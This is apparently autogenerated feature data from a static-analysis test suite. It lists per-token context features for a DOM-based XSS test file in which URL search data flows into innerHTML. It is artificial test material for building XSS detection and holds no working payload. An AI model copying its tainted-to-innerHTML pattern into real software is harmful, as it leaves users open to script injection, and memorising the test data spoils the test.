autogenerated/Xss/DomBasedXss/tst.js:188:42:188:48 | tainted | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/tst.js:188:42:188:48 | tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:188:42:188:48 | tainted | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/tst.js:188:42:188:48 | tainted | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | | autogenerated/Xss/DomBasedXss/tst.js:188:42:188:48 | tainted | enclosingFunctionName | references | | autogenerated/Xss/DomBasedXss/tst.js:188:42:188:48 | tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:189:5:189:17 | createElement | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:189:5:189:17 | createElement | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:189:5:189:17 | createElement | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:189:5:189:17 | createElement | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:189:5:189:17 | createElement | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:189:5:189:19 | createElement() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:189:5:189:19 | createElement() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:189:5:189:19 | createElement() | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:189:5:189:19 | createElement() | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:189:5:189:19 | createElement() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:189:5:189:19 | exceptional return of createElement() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:189:5:189:19 | exceptional return of createElement() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:189:5:189:19 | exceptional return of createElement() | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:189:5:189:19 | exceptional return of createElement() | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:189:5:189:19 | exceptional return of createElement() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:189:5:189:29 | createE ... nerHTML | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:189:5:189:29 | createE ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:189:5:189:29 | createE ... nerHTML | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:189:5:189:29 | createE ... nerHTML | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:189:5:189:29 | createE ... nerHTML | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:189:5:189:39 | createE ... tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:189:5:189:39 | createE ... tainted | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:189:5:189:39 | createE ... tainted | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:189:5:189:39 | createE ... tainted | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:189:5:189:39 | createE ... tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:189:21:189:29 | innerHTML | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:189:21:189:29 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:189:21:189:29 | innerHTML | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:189:21:189:29 | innerHTML | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:189:21:189:29 | innerHTML | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:189:33:189:39 | tainted | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/tst.js:189:33:189:39 | tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:189:33:189:39 | tainted | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/tst.js:189:33:189:39 | tainted | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | | autogenerated/Xss/DomBasedXss/tst.js:189:33:189:39 | tainted | enclosingFunctionName | references | | autogenerated/Xss/DomBasedXss/tst.js:189:33:189:39 | tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:191:5:191:12 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:191:5:191:12 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:191:5:191:12 | document | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:191:5:191:12 | document | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:191:5:191:12 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:191:5:191:35 | documen ... assName | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:191:5:191:35 | documen ... assName | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:191:5:191:35 | documen ... assName | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:191:5:191:35 | documen ... assName | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:191:5:191:35 | documen ... assName | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:191:5:191:37 | documen ... sName() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:191:5:191:37 | documen ... sName() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:191:5:191:37 | documen ... sName() | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:191:5:191:37 | documen ... sName() | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:191:5:191:37 | documen ... sName() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:191:5:191:37 | exceptional return of documen ... sName() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:191:5:191:37 | exceptional return of documen ... sName() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:191:5:191:37 | exceptional return of documen ... sName() | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:191:5:191:37 | exceptional return of documen ... sName() | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:191:5:191:37 | exceptional return of documen ... sName() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:191:5:191:40 | documen ... me()[0] | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:191:5:191:40 | documen ... me()[0] | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:191:5:191:40 | documen ... me()[0] | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:191:5:191:40 | documen ... me()[0] | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:191:5:191:40 | documen ... me()[0] | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:191:5:191:50 | documen ... nerHTML | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:191:5:191:50 | documen ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:191:5:191:50 | documen ... nerHTML | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:191:5:191:50 | documen ... nerHTML | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:191:5:191:50 | documen ... nerHTML | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:191:5:191:60 | documen ... tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:191:5:191:60 | documen ... tainted | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:191:5:191:60 | documen ... tainted | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:191:5:191:60 | documen ... tainted | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:191:5:191:60 | documen ... tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:191:14:191:35 | getElem ... assName | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:191:14:191:35 | getElem ... assName | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:191:14:191:35 | getElem ... assName | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:191:14:191:35 | getElem ... assName | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:191:14:191:35 | getElem ... assName | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:191:39:191:39 | 0 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:191:39:191:39 | 0 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:191:39:191:39 | 0 | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:191:39:191:39 | 0 | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:191:39:191:39 | 0 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:191:42:191:50 | innerHTML | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:191:42:191:50 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:191:42:191:50 | innerHTML | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:191:42:191:50 | innerHTML | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:191:42:191:50 | innerHTML | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:191:54:191:60 | tainted | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/tst.js:191:54:191:60 | tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:191:54:191:60 | tainted | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/tst.js:191:54:191:60 | tainted | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | | autogenerated/Xss/DomBasedXss/tst.js:191:54:191:60 | tainted | enclosingFunctionName | references | | autogenerated/Xss/DomBasedXss/tst.js:191:54:191:60 | tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:192:5:192:26 | getElem ... assName | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:192:5:192:26 | getElem ... assName | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:192:5:192:26 | getElem ... assName | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:192:5:192:26 | getElem ... assName | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:192:5:192:26 | getElem ... assName | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:192:5:192:28 | exceptional return of getElem ... sName() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| 